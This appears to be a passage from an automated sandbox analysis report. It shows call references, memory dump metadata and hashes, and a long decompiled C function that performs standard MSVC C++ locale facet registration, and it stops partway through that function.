__EH_prolog3.LIBCMT ref: 6DDD7786
std::_Lockit::_Lockit.LIBCPMT ref: 6DDD7790
int.LIBCPMT ref: 6DDD77A7

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

codecvt.LIBCPMT ref: 6DDD77CA
std::_Facet_Register.LIBCPMT ref: 6DDD77E1
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDD7801
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDD781F

Strings

,km, xrefs: 6DDD779B

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
String ID: ,km
API String ID: 2594415655-221775841
Opcode ID: 9f4076ad3b005f29c8377323f2cf970b3fee90d3bcfa8f0819c396791d85367b
Instruction ID: 02b8303f6611af074d1def079d5f5471ae2eb880c7707a0a31c82de0fb6d1ee1
Opcode Fuzzy Hash: 9f4076ad3b005f29c8377323f2cf970b3fee90d3bcfa8f0819c396791d85367b
Instruction Fuzzy Hash: 5211E275D08219FBCF01FBA4C840ABEB7B5AF44718F220449F511AB290DFB0AA05CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDEEEB, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6DDDEEEB(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t321;
				signed int _t322;
				void* _t334;
				void* _t347;
				void* _t360;
				void* _t373;
				void* _t386;
				void* _t399;
				void* _t412;
				void* _t425;
				void* _t438;
				void* _t451;
				void* _t464;
				void* _t477;
				void* _t490;
				void* _t503;
				void* _t516;
				void* _t529;
				void* _t542;
				void* _t555;
				void* _t568;
				void* _t581;
				void* _t594;
				signed int _t853;
				signed int _t923;
				signed int _t924;
				signed int _t925;
				signed int _t926;
				signed int _t927;
				signed int _t928;
				signed int _t929;
				signed int _t930;
				signed int _t931;
				signed int _t932;
				signed int _t933;
				signed int _t934;
				signed int _t935;
				signed int _t936;
				signed int _t937;
				signed int _t938;
				signed int _t939;
				signed int _t940;
				signed int _t941;
				signed int _t942;
				signed int _t943;
				signed int _t945;
				signed int _t946;
				signed int _t947;
				signed int _t948;
				signed int _t949;
				signed int _t950;
				signed int _t951;
				signed int _t952;
				signed int _t953;
				signed int _t954;
				signed int _t955;
				signed int _t956;
				signed int _t957;
				signed int _t958;
				signed int _t959;
				signed int _t960;
				signed int _t961;
				signed int _t962;
				signed int _t963;
				signed int _t964;
				signed int _t965;
				signed int _t966;
				signed int _t967;
				void* _t990;

				_t920 = __edx;
				_t699 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t990 - 0x14, 0);
				_t945 =  *0x6de96e04; // 0x0
				 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
				 *(_t990 - 0x10) = _t945;
				_t321 = E6DDB161C(0x6de96b30);
				_t702 =  *((intOrPtr*)(_t990 + 8));
				_t322 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t321);
				_t922 = _t322;
				if(_t322 != 0) {
					L5:
					E6DDD66BA(_t990 - 0x14);
					return E6DDF0075(_t922);
				} else {
					if(_t945 == 0) {
						_push( *((intOrPtr*)(_t990 + 8)));
						_push(_t990 - 0x10);
						__eflags = E6DDE0C9D(__ebx, _t702, __edx, _t922, _t945) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t990 - 0x20);
							E6DDF3D74(_t990 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t922, _t945, 0x14);
							E6DDD6653(_t990 - 0x14, 0);
							_t946 =  *0x6de96de4; // 0x0
							 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
							 *(_t990 - 0x10) = _t946;
							_t334 = E6DDB161C(0x6de96d90);
							_t709 =  *((intOrPtr*)(_t990 + 8));
							_t923 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t334);
							__eflags = _t923;
							if(_t923 != 0) {
								L12:
								E6DDD66BA(_t990 - 0x14);
								return E6DDF0075(_t923);
							} else {
								__eflags = _t946;
								if(_t946 == 0) {
									_push( *((intOrPtr*)(_t990 + 8)));
									_push(_t990 - 0x10);
									__eflags = E6DDE0D03(_t699, _t709, __edx, _t923, _t946) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t990 - 0x20);
										E6DDF3D74(_t990 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t699, _t923, _t946, 0x14);
										E6DDD6653(_t990 - 0x14, 0);
										_t947 =  *0x6de96db4; // 0x0
										 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
										 *(_t990 - 0x10) = _t947;
										_t347 = E6DDB161C(0x6de96d68);
										_t716 =  *((intOrPtr*)(_t990 + 8));
										_t924 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t347);
										__eflags = _t924;
										if(_t924 != 0) {
											L19:
											E6DDD66BA(_t990 - 0x14);
											return E6DDF0075(_t924);
										} else {
											__eflags = _t947;
											if(_t947 == 0) {
												_push( *((intOrPtr*)(_t990 + 8)));
												_push(_t990 - 0x10);
												__eflags = E6DDE0DA5(_t699, _t716, __edx, _t924, _t947) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t990 - 0x20);
													E6DDF3D74(_t990 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t699, _t924, _t947, 0x14);
													E6DDD6653(_t990 - 0x14, 0);
													_t948 =  *0x6de96dd4; // 0x0
													 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
													 *(_t990 - 0x10) = _t948;
													_t360 = E6DDB161C(0x6de96b28);
													_t723 =  *((intOrPtr*)(_t990 + 8));
													_t925 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t360);
													__eflags = _t925;
													if(_t925 != 0) {
														L26:
														E6DDD66BA(_t990 - 0x14);
														return E6DDF0075(_t925);
													} else {
														__eflags = _t948;
														if(_t948 == 0) {
															_push( *((intOrPtr*)(_t990 + 8)));
															_push(_t990 - 0x10);
															__eflags = E6DDE0E47(_t699, _t723, _t920, _t925, _t948) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t990 - 0x20);
																E6DDF3D74(_t990 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t699, _t925, _t948, 0x14);
																E6DDD6653(_t990 - 0x14, 0);
																_t949 =  *0x6de96de8; // 0x0
																 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																 *(_t990 - 0x10) = _t949;
																_t373 = E6DDB161C(0x6de96d94);
																_t730 =  *((intOrPtr*)(_t990 + 8));
																_t926 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t373);
																__eflags = _t926;
																if(_t926 != 0) {
																	L33:
																	E6DDD66BA(_t990 - 0x14);
																	return E6DDF0075(_t926);
																} else {
																	__eflags = _t949;
																	if(_t949 == 0) {
																		_push( *((intOrPtr*)(_t990 + 8)));
																		_push(_t990 - 0x10);
																		__eflags = E6DDE0EB7(_t699, _t730, _t920, _t926, _t949) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t990 - 0x20);
																			E6DDF3D74(_t990 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t699, _t926, _t949, 0x14);
																			E6DDD6653(_t990 - 0x14, 0);
																			_t950 =  *0x6de96db8; // 0x0
																			 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																			 *(_t990 - 0x10) = _t950;
																			_t386 = E6DDB161C(0x6de96d6c);
																			_t737 =  *((intOrPtr*)(_t990 + 8));
																			_t927 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t386);
																			__eflags = _t927;
																			if(_t927 != 0) {
																				L40:
																				E6DDD66BA(_t990 - 0x14);
																				return E6DDF0075(_t927);
																			} else {
																				__eflags = _t950;
																				if(_t950 == 0) {
																					_push( *((intOrPtr*)(_t990 + 8)));
																					_push(_t990 - 0x10);
																					__eflags = E6DDE0F1F(_t699, _t737, _t920, _t927, _t950) - 0xffffffff;
																					if(__eflags == 0) {
																						E6DDB1438(_t990 - 0x20);
																						E6DDF3D74(_t990 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de383cf, _t699, _t927, _t950, 0x14);
																						E6DDD6653(_t990 - 0x14, 0);
																						_t951 =  *0x6de96dec; // 0x0
																						 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																						 *(_t990 - 0x10) = _t951;
																						_t399 = E6DDB161C(0x6de96d98);
																						_t744 =  *((intOrPtr*)(_t990 + 8));
																						_t928 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t399);
																						__eflags = _t928;
																						if(_t928 != 0) {
																							L47:
																							E6DDD66BA(_t990 - 0x14);
																							return E6DDF0075(_t928);
																						} else {
																							__eflags = _t951;
																							if(_t951 == 0) {
																								_push( *((intOrPtr*)(_t990 + 8)));
																								_push(_t990 - 0x10);
																								__eflags = E6DDE0F87(_t699, _t744, _t920, _t928, _t951) - 0xffffffff;
																								if(__eflags == 0) {
																									E6DDB1438(_t990 - 0x20);
																									E6DDF3D74(_t990 - 0x20, 0x6de93504);
																									asm("int3");
																									E6DDF00AC(0x6de383cf, _t699, _t928, _t951, 0x14);
																									E6DDD6653(_t990 - 0x14, 0);
																									_t952 =  *0x6de96dbc; // 0x0
																									 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																									 *(_t990 - 0x10) = _t952;
																									_t412 = E6DDB161C(0x6de96d70);
																									_t751 =  *((intOrPtr*)(_t990 + 8));
																									_t929 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t412);
																									__eflags = _t929;
																									if(_t929 != 0) {
																										L54:
																										E6DDD66BA(_t990 - 0x14);
																										return E6DDF0075(_t929);
																									} else {
																										__eflags = _t952;
																										if(_t952 == 0) {
																											_push( *((intOrPtr*)(_t990 + 8)));
																											_push(_t990 - 0x10);
																											__eflags = E6DDE0FEF(_t699, _t751, _t920, _t929, _t952) - 0xffffffff;
																											if(__eflags == 0) {
																												E6DDB1438(_t990 - 0x20);
																												E6DDF3D74(_t990 - 0x20, 0x6de93504);
																												asm("int3");
																												E6DDF00AC(0x6de383cf, _t699, _t929, _t952, 0x14);
																												E6DDD6653(_t990 - 0x14, 0);
																												_t953 =  *0x6de96df0; // 0x0
																												 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																												 *(_t990 - 0x10) = _t953;
																												_t425 = E6DDB161C(0x6de96d9c);
																												_t758 =  *((intOrPtr*)(_t990 + 8));
																												_t930 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t425);
																												__eflags = _t930;
																												if(_t930 != 0) {
																													L61:
																													E6DDD66BA(_t990 - 0x14);
																													return E6DDF0075(_t930);
																												} else {
																													__eflags = _t953;
																													if(_t953 == 0) {
																														_push( *((intOrPtr*)(_t990 + 8)));
																														_push(_t990 - 0x10);
																														__eflags = E6DDE1057(_t699, _t758, _t920, _t930, _t953) - 0xffffffff;
																														if(__eflags == 0) {
																															E6DDB1438(_t990 - 0x20);
																															E6DDF3D74(_t990 - 0x20, 0x6de93504);
																															asm("int3");
																															E6DDF00AC(0x6de383cf, _t699, _t930, _t953, 0x14);
																															E6DDD6653(_t990 - 0x14, 0);
																															_t954 =  *0x6de96dc0; // 0x0
																															 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																															 *(_t990 - 0x10) = _t954;
																															_t438 = E6DDB161C(0x6de96d74);
																															_t765 =  *((intOrPtr*)(_t990 + 8));
																															_t931 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t438);
																															__eflags = _t931;
																															if(_t931 != 0) {
																																L68:
																																E6DDD66BA(_t990 - 0x14);
																																return E6DDF0075(_t931);
																															} else {
																																__eflags = _t954;
																																if(_t954 == 0) {
																																	_push( *((intOrPtr*)(_t990 + 8)));
																																	_push(_t990 - 0x10);
																																	__eflags = E6DDE10BF(_t699, _t765, _t920, _t931, _t954) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6DDB1438(_t990 - 0x20);
																																		E6DDF3D74(_t990 - 0x20, 0x6de93504);
																																		asm("int3");
																																		E6DDF00AC(0x6de383cf, _t699, _t931, _t954, 0x14);
																																		E6DDD6653(_t990 - 0x14, 0);
																																		_t955 =  *0x6de96df8; // 0x0
																																		 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																		 *(_t990 - 0x10) = _t955;
																																		_t451 = E6DDB161C(0x6de96da4);
																																		_t772 =  *((intOrPtr*)(_t990 + 8));
																																		_t932 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t451);
																																		__eflags = _t932;
																																		if(_t932 != 0) {
																																			L75:
																																			E6DDD66BA(_t990 - 0x14);
																																			return E6DDF0075(_t932);
																																		} else {
																																			__eflags = _t955;
																																			if(_t955 == 0) {
																																				_push( *((intOrPtr*)(_t990 + 8)));
																																				_push(_t990 - 0x10);
																																				__eflags = E6DDE1127(_t699, _t772, _t920, _t932, _t955) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6DDB1438(_t990 - 0x20);
																																					E6DDF3D74(_t990 - 0x20, 0x6de93504);
																																					asm("int3");
																																					E6DDF00AC(0x6de383cf, _t699, _t932, _t955, 0x14);
																																					E6DDD6653(_t990 - 0x14, 0);
																																					_t956 =  *0x6de96df4; // 0x0
																																					 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																					 *(_t990 - 0x10) = _t956;
																																					_t464 = E6DDB161C(0x6de96da0);
																																					_t779 =  *((intOrPtr*)(_t990 + 8));
																																					_t933 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t464);
																																					__eflags = _t933;
																																					if(_t933 != 0) {
																																						L82:
																																						E6DDD66BA(_t990 - 0x14);
																																						return E6DDF0075(_t933);
																																					} else {
																																						__eflags = _t956;
																																						if(_t956 == 0) {
																																							_push( *((intOrPtr*)(_t990 + 8)));
																																							_push(_t990 - 0x10);
																																							__eflags = E6DDE11AB(_t699, _t779, _t920, _t933, _t956) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6DDB1438(_t990 - 0x20);
																																								E6DDF3D74(_t990 - 0x20, 0x6de93504);
																																								asm("int3");
																																								E6DDF00AC(0x6de383cf, _t699, _t933, _t956, 0x14);
																																								E6DDD6653(_t990 - 0x14, 0);
																																								_t957 =  *0x6de96dc8; // 0x0
																																								 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																								 *(_t990 - 0x10) = _t957;
																																								_t477 = E6DDB161C(0x6de96d7c);
																																								_t786 =  *((intOrPtr*)(_t990 + 8));
																																								_t934 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t477);
																																								__eflags = _t934;
																																								if(_t934 != 0) {
																																									L89:
																																									E6DDD66BA(_t990 - 0x14);
																																									return E6DDF0075(_t934);
																																								} else {
																																									__eflags = _t957;
																																									if(_t957 == 0) {
																																										_push( *((intOrPtr*)(_t990 + 8)));
																																										_push(_t990 - 0x10);
																																										__eflags = E6DDE1230(_t699, _t786, _t920, _t934, _t957) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6DDB1438(_t990 - 0x20);
																																											E6DDF3D74(_t990 - 0x20, 0x6de93504);
																																											asm("int3");
																																											E6DDF00AC(0x6de383cf, _t699, _t934, _t957, 0x14);
																																											E6DDD6653(_t990 - 0x14, 0);
																																											_t958 =  *0x6de96dc4; // 0x0
																																											 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																											 *(_t990 - 0x10) = _t958;
																																											_t490 = E6DDB161C(0x6de96d78);
																																											_t793 =  *((intOrPtr*)(_t990 + 8));
																																											_t935 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t490);
																																											__eflags = _t935;
																																											if(_t935 != 0) {
																																												L96:
																																												E6DDD66BA(_t990 - 0x14);
																																												return E6DDF0075(_t935);
																																											} else {
																																												__eflags = _t958;
																																												if(_t958 == 0) {
																																													_push( *((intOrPtr*)(_t990 + 8)));
																																													_push(_t990 - 0x10);
																																													__eflags = E6DDE12B4(_t699, _t793, _t920, _t935, _t958) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6DDB1438(_t990 - 0x20);
																																														E6DDF3D74(_t990 - 0x20, 0x6de93504);
																																														asm("int3");
																																														E6DDF00AC(0x6de383cf, _t699, _t935, _t958, 0x14);
																																														E6DDD6653(_t990 - 0x14, 0);
																																														_t959 =  *0x6de96dd8; // 0x0
																																														 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																														 *(_t990 - 0x10) = _t959;
																																														_t503 = E6DDB161C(0x6de96d84);
																																														_t800 =  *((intOrPtr*)(_t990 + 8));
																																														_t936 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t503);
																																														__eflags = _t936;
																																														if(_t936 != 0) {
																																															L103:
																																															E6DDD66BA(_t990 - 0x14);
																																															return E6DDF0075(_t936);
																																														} else {
																																															__eflags = _t959;
																																															if(_t959 == 0) {
																																																_push( *((intOrPtr*)(_t990 + 8)));
																																																_push(_t990 - 0x10);
																																																__eflags = E6DDE1339(_t699, _t800, _t920, _t936, _t959) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6DDB1438(_t990 - 0x20);
																																																	E6DDF3D74(_t990 - 0x20, 0x6de93504);
																																																	asm("int3");
																																																	E6DDF00AC(0x6de383cf, _t699, _t936, _t959, 0x14);
																																																	E6DDD6653(_t990 - 0x14, 0);
																																																	_t960 =  *0x6de96db0; // 0x0
																																																	 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																	 *(_t990 - 0x10) = _t960;
																																																	_t516 = E6DDB161C(0x6de96d64);
																																																	_t807 =  *((intOrPtr*)(_t990 + 8));
																																																	_t937 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t516);
																																																	__eflags = _t937;
																																																	if(_t937 != 0) {
																																																		L110:
																																																		E6DDD66BA(_t990 - 0x14);
																																																		return E6DDF0075(_t937);
																																																	} else {
																																																		__eflags = _t960;
																																																		if(_t960 == 0) {
																																																			_push( *((intOrPtr*)(_t990 + 8)));
																																																			_push(_t990 - 0x10);
																																																			__eflags = E6DDE13A1(_t699, _t807, _t920, _t937, _t960) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6DDB1438(_t990 - 0x20);
																																																				E6DDF3D74(_t990 - 0x20, 0x6de93504);
																																																				asm("int3");
																																																				E6DDF00AC(0x6de383cf, _t699, _t937, _t960, 0x14);
																																																				E6DDD6653(_t990 - 0x14, 0);
																																																				_t961 =  *0x6de96ddc; // 0x0
																																																				 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																				 *(_t990 - 0x10) = _t961;
																																																				_t529 = E6DDB161C(0x6de96d88);
																																																				_t814 =  *((intOrPtr*)(_t990 + 8));
																																																				_t938 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t529);
																																																				__eflags = _t938;
																																																				if(_t938 != 0) {
																																																					L117:
																																																					E6DDD66BA(_t990 - 0x14);
																																																					return E6DDF0075(_t938);
																																																				} else {
																																																					__eflags = _t961;
																																																					if(_t961 == 0) {
																																																						_push( *((intOrPtr*)(_t990 + 8)));
																																																						_push(_t990 - 0x10);
																																																						__eflags = E6DDE1409(_t699, _t814, _t920, _t938, _t961) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6DDB1438(_t990 - 0x20);
																																																							E6DDF3D74(_t990 - 0x20, 0x6de93504);
																																																							asm("int3");
																																																							E6DDF00AC(0x6de383cf, _t699, _t938, _t961, 0x14);
																																																							E6DDD6653(_t990 - 0x14, 0);
																																																							_t962 =  *0x6de96de0; // 0x0
																																																							 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																							 *(_t990 - 0x10) = _t962;
																																																							_t542 = E6DDB161C(0x6de96d8c);
																																																							_t821 =  *((intOrPtr*)(_t990 + 8));
																																																							_t939 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t542);
																																																							__eflags = _t939;
																																																							if(_t939 != 0) {
																																																								L124:
																																																								E6DDD66BA(_t990 - 0x14);
																																																								return E6DDF0075(_t939);
																																																							} else {
																																																								__eflags = _t962;
																																																								if(_t962 == 0) {
																																																									_push( *((intOrPtr*)(_t990 + 8)));
																																																									_push(_t990 - 0x10);
																																																									__eflags = E6DDE1471(_t699, _t821, _t920, _t939, _t962) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										E6DDB1438(_t990 - 0x20);
																																																										E6DDF3D74(_t990 - 0x20, 0x6de93504);
																																																										asm("int3");
																																																										E6DDF00AC(0x6de383cf, _t699, _t939, _t962, 0x14);
																																																										E6DDD6653(_t990 - 0x14, 0);
																																																										_t963 =  *0x6de96dfc; // 0x0
																																																										 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																										 *(_t990 - 0x10) = _t963;
																																																										_t555 = E6DDB161C(0x6de96da8);
																																																										_t828 =  *((intOrPtr*)(_t990 + 8));
																																																										_t940 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t555);
																																																										__eflags = _t940;
																																																										if(_t940 != 0) {
																																																											L131:
																																																											E6DDD66BA(_t990 - 0x14);
																																																											return E6DDF0075(_t940);
																																																										} else {
																																																											__eflags = _t963;
																																																											if(_t963 == 0) {
																																																												_push( *((intOrPtr*)(_t990 + 8)));
																																																												_push(_t990 - 0x10);
																																																												__eflags = E6DDE14EC(_t699, _t828, _t920, _t940, _t963) - 0xffffffff;
																																																												if(__eflags == 0) {
																																																													E6DDB1438(_t990 - 0x20);
																																																													E6DDF3D74(_t990 - 0x20, 0x6de93504);
																																																													asm("int3");
																																																													E6DDF00AC(0x6de383cf, _t699, _t940, _t963, 0x14);
																																																													E6DDD6653(_t990 - 0x14, 0);
																																																													_t964 =  *0x6de96dcc; // 0x0
																																																													 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																													 *(_t990 - 0x10) = _t964;
																																																													_t568 = E6DDB161C(0x6de96d80);
																																																													_t835 =  *((intOrPtr*)(_t990 + 8));
																																																													_t941 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t568);
																																																													__eflags = _t941;
																																																													if(_t941 != 0) {
																																																														L138:
																																																														E6DDD66BA(_t990 - 0x14);
																																																														return E6DDF0075(_t941);
																																																													} else {
																																																														__eflags = _t964;
																																																														if(_t964 == 0) {
																																																															_push( *((intOrPtr*)(_t990 + 8)));
																																																															_push(_t990 - 0x10);
																																																															__eflags = E6DDE1558(_t699, _t835, _t920, _t941, _t964) - 0xffffffff;
																																																															if(__eflags == 0) {
																																																																E6DDB1438(_t990 - 0x20);
																																																																E6DDF3D74(_t990 - 0x20, 0x6de93504);
																																																																asm("int3");
																																																																E6DDF00AC(0x6de383cf, _t699, _t941, _t964, 0x14);
																																																																E6DDD6653(_t990 - 0x14, 0);
																																																																_t965 =  *0x6de96e00; // 0x0
																																																																 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																																 *(_t990 - 0x10) = _t965;
																																																																_t581 = E6DDB161C(0x6de96dac);
																																																																_t842 =  *((intOrPtr*)(_t990 + 8));
																																																																_t942 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t581);
																																																																__eflags = _t942;
																																																																if(_t942 != 0) {
																																																																	L145:
																																																																	E6DDD66BA(_t990 - 0x14);
																																																																	return E6DDF0075(_t942);
																																																																} else {
																																																																	__eflags = _t965;
																																																																	if(_t965 == 0) {
																																																																		_push( *((intOrPtr*)(_t990 + 8)));
																																																																		_push(_t990 - 0x10);
																																																																		__eflags = E6DDE15C4(_t699, _t842, _t920, _t942, _t965) - 0xffffffff;
																																																																		if(__eflags == 0) {
																																																																			E6DDB1438(_t990 - 0x20);
																																																																			E6DDF3D74(_t990 - 0x20, 0x6de93504);
																																																																			asm("int3");
																																																																			E6DDF00AC(0x6de383cf, _t699, _t942, _t965, 0x14);
																																																																			E6DDD6653(_t990 - 0x14, 0);
																																																																			_t966 =  *0x6de96dd0; // 0x0
																																																																			 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																																																			 *(_t990 - 0x10) = _t966;
																																																																			_t594 = E6DDB161C(0x6de96d60);
																																																																			_t849 =  *((intOrPtr*)(_t990 + 8));
																																																																			_t943 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t594);
																																																																			__eflags = _t943;
																																																																			if(_t943 != 0) {
																																																																				L152:
																																																																				E6DDD66BA(_t990 - 0x14);
																																																																				return E6DDF0075(_t943);
																																																																			} else {
																																																																				__eflags = _t966;
																																																																				if(_t966 == 0) {
																																																																					_push( *((intOrPtr*)(_t990 + 8)));
																																																																					_push(_t990 - 0x10);
																																																																					__eflags = E6DDE162A(_t699, _t849, _t920, _t943, _t966) - 0xffffffff;
																																																																					if(__eflags == 0) {
																																																																						_t853 = _t990 - 0x20;
																																																																						E6DDB1438(_t853);
																																																																						E6DDF3D74(_t990 - 0x20, 0x6de93504);
																																																																						asm("int3");
																																																																						E6DDF00AC(0x6de3851f, _t699, _t943, _t966, 4);
																																																																						_t967 = _t853;
																																																																						 *(_t990 - 0x10) = _t967;
																																																																						 *((intOrPtr*)(_t967 + 4)) =  *((intOrPtr*)(_t990 + 0xc));
																																																																						_push( *((intOrPtr*)(_t990 + 0x14)));
																																																																						_t315 = _t990 - 4;
																																																																						 *_t315 =  *(_t990 - 4) & 0x00000000;
																																																																						__eflags =  *_t315;
																																																																						 *_t967 = 0x6de3c0c4;
																																																																						 *((char*)(_t967 + 0x28)) =  *((intOrPtr*)(_t990 + 0x10));
																																																																						E6DDE542F(_t699, _t853, _t920, _t943, _t967,  *_t315);
																																																																						return E6DDF0075(_t967,  *((intOrPtr*)(_t990 + 8)));
																																																																					} else {
																																																																						_t943 =  *(_t990 - 0x10);
																																																																						 *(_t990 - 0x10) = _t943;
																																																																						 *(_t990 - 4) = 1;
																																																																						E6DDD6FD3(__eflags, _t943);
																																																																						 *0x6de3a26c();
																																																																						 *((intOrPtr*)( *((intOrPtr*)( *_t943 + 4))))();
																																																																						 *0x6de96dd0 = _t943;
																																																																						goto L152;
																																																																					}
																																																																				} else {
																																																																					_t943 = _t966;
																																																																					goto L152;
																																																																				}
																																																																			}
																																																																		} else {
																																																																			_t942 =  *(_t990 - 0x10);
																																																																			 *(_t990 - 0x10) = _t942;
																																																																			 *(_t990 - 4) = 1;
																																																																			E6DDD6FD3(__eflags, _t942);
																																																																			 *0x6de3a26c();
																																																																			 *((intOrPtr*)( *((intOrPtr*)( *_t942 + 4))))();
																																																																			 *0x6de96e00 = _t942;
																																																																			goto L145;
																																																																		}
																																																																	} else {
																																																																		_t942 = _t965;
																																																																		goto L145;
																																																																	}
																																																																}
																																																															} else {
																																																																_t941 =  *(_t990 - 0x10);
																																																																 *(_t990 - 0x10) = _t941;
																																																																 *(_t990 - 4) = 1;
																																																																E6DDD6FD3(__eflags, _t941);
																																																																 *0x6de3a26c();
																																																																 *((intOrPtr*)( *((intOrPtr*)( *_t941 + 4))))();
																																																																 *0x6de96dcc = _t941;
																																																																goto L138;
																																																															}
																																																														} else {
																																																															_t941 = _t964;
																																																															goto L138;
																																																														}
																																																													}
																																																												} else {
																																																													_t940 =  *(_t990 - 0x10);
																																																													 *(_t990 - 0x10) = _t940;
																																																													 *(_t990 - 4) = 1;
																																																													E6DDD6FD3(__eflags, _t940);
																																																													 *0x6de3a26c();
																																																													 *((intOrPtr*)( *((intOrPtr*)( *_t940 + 4))))();
																																																													 *0x6de96dfc = _t940;
																																																													goto L131;
																																																												}
																																																											} else {
																																																												_t940 = _t963;
																																																												goto L131;
																																																											}
																																																										}
																																																									} else {
																																																										_t939 =  *(_t990 - 0x10);
																																																										 *(_t990 - 0x10) = _t939;
																																																										 *(_t990 - 4) = 1;
																																																										E6DDD6FD3(__eflags, _t939);
																																																										 *0x6de3a26c();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t939 + 4))))();
																																																										 *0x6de96de0 = _t939;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t939 = _t962;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t938 =  *(_t990 - 0x10);
																																																							 *(_t990 - 0x10) = _t938;
																																																							 *(_t990 - 4) = 1;
																																																							E6DDD6FD3(__eflags, _t938);
																																																							 *0x6de3a26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t938 + 4))))();
																																																							 *0x6de96ddc = _t938;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t938 = _t961;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t937 =  *(_t990 - 0x10);
																																																				 *(_t990 - 0x10) = _t937;
																																																				 *(_t990 - 4) = 1;
																																																				E6DDD6FD3(__eflags, _t937);
																																																				 *0x6de3a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t937 + 4))))();
																																																				 *0x6de96db0 = _t937;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t937 = _t960;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t936 =  *(_t990 - 0x10);
																																																	 *(_t990 - 0x10) = _t936;
																																																	 *(_t990 - 4) = 1;
																																																	E6DDD6FD3(__eflags, _t936);
